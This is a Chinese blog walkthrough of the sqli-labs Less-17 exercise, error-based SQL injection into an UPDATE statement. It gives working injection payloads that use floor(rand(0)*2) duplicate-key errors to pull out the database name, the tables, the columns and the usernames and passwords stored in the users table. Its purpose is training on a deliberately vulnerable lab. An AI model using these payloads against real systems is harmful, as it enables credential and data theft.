码迷,mamicode.com
首页 > 数据库 > 详细

sqli-labs less17 update query-error based

时间:2019-06-11 09:43:21      阅读:130      评论:0      收藏:0      [点我收藏+]

标签:rand   select   获取数据   size   inf   image   图片   png   ima   

预备知识:逻辑or与逻辑and

    (1)a or b:若a为true,则不用管b,直接返回true。

    (2)a and b:若a为false,则不用管b,直接返回false。

    (3)优先级:等号>and>or.

  应用:

    (1)

update users set password=‘‘ or 0 where username=admin(下图中三字段分别为id,username,password)

      技术图片

    (2)

update users set password=1234 or 0 where username=admin

      技术图片

    (3)

update users set password=‘‘ and 1 where username=admin

      技术图片

    (4)

update users set password=1234 and 1 where username=admin

      技术图片

 

正文:

1、获取数据库名

 

 or (select count(*) from information_schema.tables group by concat_ws(-,(select database()),floor(rand(0)*2))) where username=‘admin‘-- //不要忘记空格
或者
1234 and (select count(*) from information_schema.tables group by concat_ws(-,(select database()),floor(rand(0)*2))) where username=‘admin‘-- 

技术图片

2、获取数据security中的表

 or (select count(*) from information_schema.tables group by concat_ws(-,(select group_concat(table_name) from information_schema.tables where table_schema=security),floor(rand(0)*2))) where username=admin-- 
或者
1234 and (select count(*) from information_schema.tables group by concat_ws(-,(select group_concat(table_name) from information_schema.tables where table_schema=security),floor(rand(0)*2))) where username=admin-- 

技术图片

3、获取表users中的字段

 or (select count(*) from information_schema.tables group by concat_ws(-,(select group_concat(column_name) from information_schema.columns where table_schema=security and table_name=users),floor(rand(0)*2))) where username=admin-- 

技术图片

4、获取users中的用户名和密码

 or (select count(*) from information_schema.tables group by concat_ws(-,(select concat_ws(-,username,password) from information_schema.tables where table_name=users limit 0,1),floor(rand(0)*2))) where username=admin-- 

技术图片

 

sqli-labs less17 update query-error based

标签:rand   select   获取数据   size   inf   image   图片   png   ima   

原文地址:https://www.cnblogs.com/jielun/p/11001475.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!